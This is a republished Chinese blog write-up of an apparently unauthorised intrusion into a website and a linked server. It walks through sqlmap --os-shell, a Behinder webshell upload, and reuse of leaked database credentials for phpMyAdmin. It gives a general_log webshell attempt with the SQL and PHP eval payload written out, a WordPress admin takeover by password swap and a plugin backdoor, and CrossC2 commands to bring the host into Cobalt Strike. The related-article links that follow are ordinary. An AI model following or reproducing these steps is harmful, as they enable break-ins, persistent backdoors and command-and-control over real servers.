专栏首页黑白天安全团队某次网站的渗透测试

某次网站的渗透测试

第一台服务器权限

在对某网站进行网站安全测试的时候发现这个网站的新闻发表处存在SQL的注入漏洞。

对此网站进行SQL注入测试之后发现这个网站是没有WAF之类的防护软件进行包含网站的,那么我就直接使用SQLMAP进行SQL注入测试。SQLMAP给出网站的指纹信息,服务器是一个window的服务器,并且版本是windows 10 或者2016。如果是服务器的话我绝对可能就是windows 2016了。并且中间件是IIS10.0。数据库是mysql。对方给的数据库权限比较高,那么就直接从数据库入手吧。

在SQLMAP中使用-os-shell进去系统命令执行界面,查看一下当前服务器的权限,比较低的一个权限。

利用SQLMAP执行了 -os-shell之后留下的一个网站上传点进行木马上传,经过测试之后发现该网站对普通的一句话木马流量有进行拦截,木马在对方目录下并没有被删除,但是访问的时候是显示500服务器内部错误。我推测的话大概率就是对方有一些防护设备对敏感流量进行了拦截导致无法连接回来。

对于这种的话可以使用冰蝎的木马来进行webshell获取,冰蝎的木马是有加密的一般的防护设备很难设备得到。这里我直接上传冰蝎的木马,访问上传的木马这里显示没有问题。

使用冰蝎客户端进行连接,进入到目录管理中,发现对方的服务器上面具有好几个盘符。如果盘符很多的话那么对方的服务器应该是有搭建其他的网站的吧。这里我使用域名反查对该IP进行查询,发现的的确确有搭建好几个网站。

当我在目录管理器里面点击其他网站的目录时能够顺利访问得到,对方的管理员并无对目录的权限进行设定。那我就是对这服务器进行翻找。在一个盘符中找到了不同寻常的数据库连接文件。这个文件的数据库地址并不是本地服务器的IP地址。那么我就直接连接一下,发现这个数据库服务器真的可以连接成功。

如果这台服务器不是单纯的数据库服务器的话,它应该会有搭建网站的,我对这个IP地址进行域名反查,果不其然这个服务器有搭建一个网站

在对这服务器的数据库进行查看的时候发现数据库里面有phpmyadmin和wordpress的数据库。那么这个网站就是由wordpressCMS搭建配合phpmyadmin的数据库管理搭建的网站。对其进行指纹探测。服务器的系统是ubuntu的操作系统,中间件是apache。

我直接在网站的URL上面加上phpmyadmin,果不其然哈哈哈直接跳转到了phpmyadmin的登陆界面,我直接使用数据库的ROOT权限的密码登陆了进去。

第二台服务器权限

对于高权限的phpmyadmin提权的思路就是通过写入一句话进去或者通过日志提权,这两者都需要由网站的绝对路径,对其网站的路径进行扫描,发现了有一出及其关键的文件出现info.php,按照经验来讲那么肯定就是phpinfo的页面了,可以从phpinfo页面中找出它的网站绝对路径出来再配合phpmyadmin写入一句话到网站的目录下。

通过查看phpinfo泄露出来的网站绝对路径。就可以写入一句话木马进入网站

对于phpmyadmin渗透思路就是通过写入一句话木马过去,首先如果可以写入的话,需要看一个变量是否为空,如果是空的话代表可以任意路径写入文件。但是这里由指定路径。

首先通过SHOW VARIABLES LIKE "secure_file_priv"查看是否为空

那么我们就需要通过日志来获取webshell了。我们通过在变量选项里面。找到general log是一个off的状态。

那么就需要开启日志功能,并且讲日志的路径改为网站的路径,在写入一句话木马进入。

第一步:set global general_log='on'      # 开启日志
第二步:set global  general_log_file ="/var/www/html/s.php"       # 日志写入的文件
第三步:select "<?php eval($_POST['xxx'])?>"      # 执行带有一句话的sql语句

第二步将日志写入的文件设置的路径为网站的路径。但是第二步失败了,这里说general_log_file不能为/var/www/html/。

进入无法通过phpmyadmin这个突破口获取权限的话,那么还有第二个思路的,就是通过phpmyadmin获取后台管理员的密码进入后台获取权限,这里后台管理员的密码不能破解出来,我直接就替换了另外一个密码,进去后台之后添加多一个为我所用的网站管理的账号,之后再吧之前修改的管理员的密码恢复回去。

进入到wordpress的后台之后,获取shell的方式一般都是修改外观的源代码插入一句话、利用插件的漏洞或者修改插件的源代码插入一句话。这里我从外观源代码插入一句话开始。但是这里不允许修改代码。

接着我对可以利用的插件进行源代码插入,再利用插件的插入一句话的时候需要测试一下插件是否可以访问,有一些插件访问的时候是被拒绝的!

经过测试之后找到一个可以修改并且可以访问的插件插入一句话木马进去

之后使用蚁剑直接连接到一句话。完美!

接着让这台主机上线CobaltStrike,可以使用CrossC2来上线linux主机,在github上下载项目:

CrossC2插件项目地址:https://github.com/gloxec/CrossC2

下载之后把src目录下的genCrossC2.Linux上传到CobaltStrike服务器上面

把 CobaltStrike 服务端的.cobaltstrike.beacon_keys下载到 CobaltStrike 客户端目录下。

生成一个Https的监听,服务端开启监听 windows/beacon_https/reverse_https 类型的beacon

接着回到CobaltStrike服务器,使用genCrossC2.Linux生成一个Linux可以执行的木马

./genCrossC2.Linux 监听的IP 监听的端口 null null Linux x64 C2

把木马上传到对方的服务器上面,并且赋予权限,然后执行。

等待一会对方就可以上线CobaltStrike了!!!

这台主机的网卡信息有docker,我感觉应该是有一些服务是通过docker部署的吧,后渗透的话还是以后再深入了!

本文分享自微信公众号 - 黑白天(HBT-SEC),作者:jen

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-07-14

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 泄露数据库密码到拿下wordpress站点服务器

    其实我一直想尝试的是,弱密码进入别人后台搞一番事情,但是这种事情我也只能从别人的文章中看得到了!哈哈哈哈哈哈这也太难受了!那我是如何进入别人后台的呢!也是从数据...

    cn0sec
  • Gophish钓鱼测试

    Gophish 是一个功能强大的开源网络钓鱼框架,可以轻松测试组织的网络钓鱼风险,专为企业和渗透测试人员设计

    cn0sec
  • Apache Solr 漏洞复现

    Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558) 漏洞描述

    cn0sec
  • 腾讯云提示有木马文件事件通知 该如何处理?

    客户的网站于近日收到了来自腾讯云的安全告警,木马文件事件通知!第一时间客户联系到我们SINE安全,把腾讯云提示的问题反馈给了我们安全技术部门,说是网站突然收到了...

    网站安全专家
  • 网站建设应该注意哪些规范?

    网站建设应该从一开始就计划好大部分内容与细节,深圳网站建设尤其注重定位与专注。一个网站可以有不同的产品,但一定要有相同的主题,卖网站主机空间的不能在网站同时放上...

    达沃斯分享
  • 网站被黑 搜索快照被劫持跳转到另一网站

    2018年圣诞节来临之际随着互联网的网站数量不断的庞大增加,随之而来的网站安全问题凸显上升,很多企业网站的百度快照出现被劫持跳转,以及网站快照被劫持在百度中的搜...

    技术分享达人
  • 腾讯云怎么建网站-腾讯云建网站教程

    一台腾讯云服务器可以建多个网站,只要你的服务器配置足够高,就可以建很多。服务器的配置指的是CPU和内存,配置越高建的网站就越多。如果配置低,建的网站太多,服务器...

    秋风落叶
  • SiteLock最新报告显示:针对网站的攻击激增,平均每天有63起

    根据SiteLock于本周一发布的最新分析报告显示,在过去的几个月里,针对网站的攻击活动数量出现了大幅增加。 ? SiteLock的网站安全内部报告是基于对超过...

    FB客服
  • 网站被劫持跳转攻击怎么解决

    企业网站遭受到攻击,首页文件被篡改,在百度的快照也被劫持跳转到其他网站上,企业网站首先要做的就是网站的安全防护,然而很多企业并不懂的构建网站安全防护,在安全方面...

    技术分享达人
  • 大型网站技术架构(四)--核心架构要素

    我是十三

扫码关注云+社区

领取腾讯云代金券